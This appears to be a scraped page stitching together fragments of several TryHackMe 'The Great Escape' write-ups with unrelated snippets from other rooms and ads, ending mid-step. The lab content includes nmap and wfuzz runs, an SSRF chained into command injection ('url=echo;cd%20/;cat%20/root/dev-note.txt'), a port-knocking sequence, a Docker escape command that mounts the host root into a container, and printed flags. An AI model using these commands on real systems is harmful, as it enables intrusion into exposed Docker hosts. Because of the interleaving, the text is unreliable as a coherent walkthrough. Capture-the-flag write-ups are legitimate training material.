Let’s take a look. This we can find with some quick Googling. Hello, I was subscribed to TryHackMe for 3 months and, in my opinion, if a subscription is affordable for you I highly suggest you buy it. Although most of the content on the platform is free, the subscription gives some cool things: there are some subscription-only rooms that cover super great content, the learning paths can guide you to understand some interesting subjects, and deployed rooms. So now I know that I am root on this machine. git, After trying a bunch of file uploads with various formats, I decided to give up on this portion and do some more research. 22/tcp open ssh Some lazy developers will simply use a system call to curl or similar. The first two flags were fairly easy to get (thank you Python). I did not get any response from either port 80 or 22. nmap also reveals the robots.txt file contents on the HTTP web server, showing 3 disallowed entries: Let’s note these entries for now and visit the web server: Looks like we have a photography website! I first listed out the files in the /root directory: There is an interesting file called dev-note.txt. Docker is an extremely useful tool which allows us to isolate applications from each other and the host OS without having to resort to virtual machines. Enumeration First I added the IP to the hosts file: <ip> escape.thm Nmap # nmap --min-rate=3000 -sV -sC -o nmap escape.thm Nmap scan report for escape.thm Host is up (0.17s latency). On the Wikipedia page, there is a list of common well-known URIs. For Education. The Great Escape is a medium-rated Linux-based room on TryHackMe by hydragyrum. I then moved to the root directory and found the 3rd flag there. Please report any incorrect results at https://nmap.org/submit/ . I hosted an HTTP server on my local machine, then inputted my IP address into the upload form. I checked for the other protocols like file, zip and gopher, but all of them gave some sort of error.
What if you could REALLY customize your new Touch Bar? I then decided to run GoBuster on the /api portion of the site, but to no avail. More information here: Endlessh: An SSH Tarpit. So let's jump straight to TryHackMe and deploy the machine; here is the link for the machine: https://www.tryhackme.com/room/rrootme TASK-1: Deploy the Machine Start the machine. Apparently there’s something responding at the other end! Awk Command. We can successfully list the docker images using the API. I created a short Python script so I could execute this from the terminal (just to make my life easier, I was almost at my wits' end at this point). Take a look at my article on the subject. Let’s take a look: Interesting! When we go to the nginx directory, we can see that there is a hidden directory called .well-known, which is what the flag 1 hint was referring to. I then grabbed an interactive session with sh: I navigated to this directory and had a look around. THM is far more of a hold-your-hand-as-you-learn experience. Port Scan Full Port Scan It has an interesting SSRF for foothold, then we need to enumerate the system through command injection in a hidden API. Alpine (https://alpinelinux.org/) is a Linux distribution built around musl libc and BusyBox. Link for the room here. There wasn’t a whole lot to this site (on the face of it at least); just a homepage and a login/sign-up page. We can see that there are three commits. I was getting re-trained from an 11-year-long business, marketing and hospitality background, pursuing the yearned dream of becoming a pentester. This basically made any automated brute-forcing tools like gobuster and hydra unusable. Another common file on servers is the robots.txt file. December 5, 2021 It's an open telnet connection! /exif on the internal port 8080. Frankly, I learned new… classroom A Simple Web App Start off with a simple webapp.
Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. TryHackMe - The Great Escape (Medium) 15 Feb 2021 in Write-Ups on Write-up, Docker, Pentesting, Ethical-hacking, Beginner A medium level room showcasing Docker container escape! This is a write-up for the Exploiting Telnet task of the Network Services room on TryHackMe. docker -H 10.10.50.223:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt bash, Boom, we can escape docker. THM{c62517c0cad93ac93a92b1315a32d734}, Android OTA payload dumping / extraction: 4 tools review, $ sudo pacman -S gtfoblookup docker curl nmap burpsuite ssrf-sheriff ruby-httpclient. Once done with that, we can open an exposed docker daemon via port knocking and exploit that to escape the containerized environment. (hint: yes.). We are essentially mounting the host’s “/” directory to the “/mnt” dir in a new container, chrooting and then connecting via a shell (Reference — Task 9). You can find me on: LinkedIn: https://www.linkedin.com/in/shamsher-khan-651a35162/ Twitter: https://twitter.com/shamsherkhannn Tryhackme: https://tryhackme.com/p/Shamsher, For more walkthroughs stay tuned… Before you go…. docker, I completed this through TryHackMe. Enumeration Intro Welcome to my first write-up on a medium-level box by TryHackMe. If we see what is in the home directory for the current user, you’ll see a dev-note.txt file. But we see a major flaw here: the docker port is “wide” open. For now I don't know, but with the error message I get I know it's a Java backend: class Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port. This likely indicates that there’s maybe some rate limiting going on with the login uri, especially since manually logging in returns a 401.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 11:27 CET
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

$ export DOCKER_HOST=tcp://10.10.70.53:2375

CONTAINER ID   IMAGE          COMMAND                  CREATED        STATUS      PORTS                  NAMES
49fe455a9681   frontend       "/docker-entrypoint.…"   2 months ago   Up 2 hours  0.0.0.0:80->80/tcp     dockerescapecompose_frontend_1
4b51f5742aad   exif-api-dev   "./application -Dqua…"   2 months ago   Up 2 hours                         dockerescapecompose_api-dev-backup_1
cb83912607b9   exif-api       "./application -Dqua…"   2 months ago   Up 2 hours  8080/tcp               dockerescapecompose_api_1
548b701caa56   endlessh       "/endlessh -v"           2 months ago   Up 2 hours  0.0.0.0:22->2222/tcp   dockerescapecompose_endlessh_1

REPOSITORY                                    TAG       IMAGE ID       CREATED         SIZE
exif-api-dev                                  latest    4084cb55e1c7   2 months ago    214MB
exif-api                                      latest    923c5821b907   2 months ago    163MB
frontend                                      latest    577f9da1362e   2 months ago    138MB
endlessh                                      latest    7bde5182dc5e   2 months ago    5.67MB
nginx                                         latest    ae2feff98a0c   3 months ago    133MB
debian                                        10-slim   4a9cd57610d6   3 months ago    69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   3 months ago    103MB
alpine                                        3.9       78a2ce922f86   10 months ago   5.55MB

There is also a suspicious dev-note.txt file in the /root directory. Task 2 - Understanding NFS. Author Ee En Goh TryHackMe Room(s) solved Read data files from: /usr/bin/../share/nmap Well this is awkward. If you do an aggressive nmap scan on port 22, you’ll see that it marks ssh with a question mark, meaning it’s not sure if it actually is ssh. Unfortunately for us, we can’t read this file since it contains a banned word (probably some filter of sorts). You can read part one here: Linux Fundamentals Part 1.
| GenericLines: |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) Tryhackme The Great Escape | Razor-Sec, written by Razor-Admin on 19 Feb 2021. Summary: Introduction, Scanning, Nmap, Enumeration, Fuzzing, SSRF, Docker Access, Docker Escape, From Docker. Introduction: This is a practical room from TryHackMe entitled "The Great Escape" with Medium difficulty. Port Knocking, I tried to run a gobuster directory scan on the web server: Unfortunately, the scan was not working, as the web server was returning a status code of 200 for every attempt, even if the attempted directory did not exist. 1 minute read. Once the command is run, we are placed in a privileged shell within a newly created alpine container. THM{b801135794bf1ed3a2aafaa44c2e5ad4}. Since there was rate limiting implemented, I did not bother to go down that path. ADAT is a small tool used to assist CTF players and penetration testers with easy commands to run against an Active Directory Domain Controller. Interested in gaining a new perspective on things? We just need to knock the right ports, which should open up the docker tcp port. What welcome message do we receive? Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-15 21:16 +0545 So /api/exif exposed on port 80 must be the same API as It consists of tons of rooms, which are virtual classrooms dedicated to particular cybersecurity topics, with different difficulties. username Let’s try! I uploaded a PNG image and the app gave the information about the image. We can then navigate to /mnt/root to access the /root directory on the real machine. An error occurred: sun.net.www.protocol.file.FileURLConnection cannot be cast to java.net.HttpURLConnection. SMTP stands for "Simple Mail Transfer Protocol". But I quickly discovered /robots.txt giving some interesting paths to try: I retrieved the source code of the upload form at /exif-util.bak.txt.
The root file system of the host will be mounted on the /mnt directory of the container and the root of the container is changed to /mnt. I used nmap for this: From the above, it shows that the machine is open on ports 22 (ssh) and 80 (web page). Clicking into it, there’s a login form. Description: The result is a root shell. I first had a look to see if there were any image files available. https://tryhackme.com/room/thegreatescape Steps There are obviously multiple ways to do this challenge and I would strongly recommend that you look at other published writeups to learn the different ways you can tackle this, especially the final part. Our nmap scan showed us the presence of this file with a few disallowed entries; let’s take a closer look: We already know about the api route, but what’s this exif-util thing? RustScan & Ciphey. These .bak files are mostly created by a program that needs to store backups. http://api-dev-backup:8080/exif?url=noraj;

lrwxrwxrwx 1 root root    9 Jan  6 20:51 .bash_history -> /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4.0K Jan  7 16:48 .git
-rw-r--r-- 1 root root   53 Jan  6 20:51 .gitconfig
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-rw-r-- 1 root root  201 Jan  7 16:46 dev-note.txt

The Hydra's Head The Great Escape - TryHackMe January 7, 2021 17-minute read Writeups writeup • security • tryhackme Docker, Networks, and Container Escapes; Oh My! Also, the file can be included by a URL. Task 6: Sudo - Shell Escape Sequence. We can try using git commands to enumerate more information about the repo: (The -C option is needed as we are trying to run git from outside the directory that hosts the repository.) Here I have created a container from the frontend image in interactive mode, executing the sh binary. Clicking around throws everything else to the login page, so that’s a no go. As we can see, the ports have been knocked.
We can’t use tools like Gobuster for this room, which means we probably don’t need to brute-force the names of the files. I didn’t really know how to proceed at this point, so I decided to take a break and come back to it the next day. SSRF, /api/exif?url=http://api-dev-backup:8080/exif?url=1. The first thing I did was to see what was happening on the machine. images As you can see, Hydra made a few commits: adding a flag, removing the flag and fixing the dev note. As I was manually poking, I got a response from port 8080. bruteforcing, In this post, I will be explaining each of the vulnerabilities and initial exploitation methods for the boxes, ranging from easy to hard. In this video walk-through, we covered Sandbox Detection and Evasion Techniques such as sleeping functions, system and network enumeration as part of the TryHackMe Sandbox Evasion Challenge. Going to port 80 shows us a website, PHOTO Classroom. Question: Download the above given file, and use the awk command to print the following output: ippsec:34024 john:50024 thecybermentor:25923 liveoverflow:45345 nahamsec:12365 stok:1234. All the errors that I saw earlier were default 403 and 503 errors, but this is different. Now, to look for the web flag, we can access the frontend container in docker. I restarted my docker service by stopping it and then starting it again after waiting for at least 30 seconds. |_http-server-header: nginx/1.19.6 Although the response is a 400, let’s try some other inputs, such as a blank url. From the edited dev-note.txt file, we can also see a port-knocking sequence that will grant us access to a docker tcp port. Since this is a development backup, I tried different injection techniques. Let’s take a look: The upload functionality did not help much.
The command to do so is: -H: used to indicate the host that is running docker, -it: used to spawn an interactive container (that we can use like a shell), --rm: used to remove the container after exiting, -v /root:/mnt/root: mount the /root directory on the real machine to /mnt/root on the container, alpine:3.9: indicate which image to use for the container. 80/tcp open http nginx 1.19.6 Now let’s take a look at the webserver: Now I found robots.txt, which contains different directories and files: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.50.223/FUZZ.bak.txt Since the exif tool can accept a URL, as we tried earlier, we can use the default parameter, url, to send a GET request to the url we found earlier. TryHackMe. SSRF along with code injection was used to get a root shell on a docker container. (http://api-dev-backup:8080/exif). Taking a closer look, we see this particular line: Looks like we have an internal host that is accessible by the web server! One proposed standard is the security.txt file, which should be placed in the .well-known directory. When I uploaded an image using a URL, it returned something like this: I then began to run a bunch of other stuff to confirm that they are interpreted by the URL. We can do that with curl: The -I option is used to indicate a HEAD request. After running it, we check the docker port again. Now the docker port is open, so let's check it. Note: Replace the IP Address in the script with the TryHackMe VPN IP Address, which can be found by running "ip a show tun0" on your Kali machine and looking under inet. I wanted to explore the concept of a Docker Escape. So, let's check those out. It is utilised to handle the sending of emails. (Though send me a message if you do find a way to get something with this route ;)).
I tried looking for various backup files for each of the pages on the site and eventually stumbled across the .bak file for exif-util: I continued to try some more combos with the urls I found earlier, but I didn’t get anywhere. I now realised what the clue was hinting at. TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser! Let's try other payloads. So, I manually started going through the container. PORT STATE SERVICE Let’s think a bit about the information we have. Welcome, and first of all thanks for your interest in me! We can upload a file from the machine or from a URL. Testing with an HTML file from the machine returns a 503 error. 1) Get any image > I got blue.png > cp to /thegreatescape/uploads folder So, I manually started going through the container. or SSH. I made a little script for knocking: Let’s run this: ./knock 10.10.50.223. And as we can see there is curl. Now we can check the id with the command echo;id, and we get the id of app, so we can use SSRF. Now, after looking around, I found dev-note.txt here: http://10.10.50.223/api/exif?url=http://api-dev-backup:8080/exif?url=echo;cd%20/;cat%20/root/dev-note.txt, Then in the root directory I found .git. Now let’s check this. Well-known URIs are simple ways for webservers to hold metadata that any user-agent can access. Let’s upload an image to see: The API does something, but it’s unlikely that we’ll be able to get any malicious content onto the system that way. We can then navigate to /mnt/root to access the /root directory on the real machine. Inside the container, we have free rein to grab the final flag. Nmap scan report for 10.10.207.95 Trying something like admin:password calls an api which returns a 401: Unauthorized response. Let’s take a closer look at our root directory, as the note did say that the files were removed.
2) dockerescapecompose_frontend_1, Per the hint in the first flag, there is a .well-known in the frontend. Then we can access docker. The Great Escape : TryHackMe 10 minute read Our devs have created an awesome new site. Only two ports are open. 2) run python3 -m http.server > this will run an HTTP server with my IP TryHackMe is a multipurpose platform where a user is able to learn, practice, compete, and create content related to cybersecurity. We can see a URL here with a similar api to the current exif-util GET call we saw before. 3) navigate to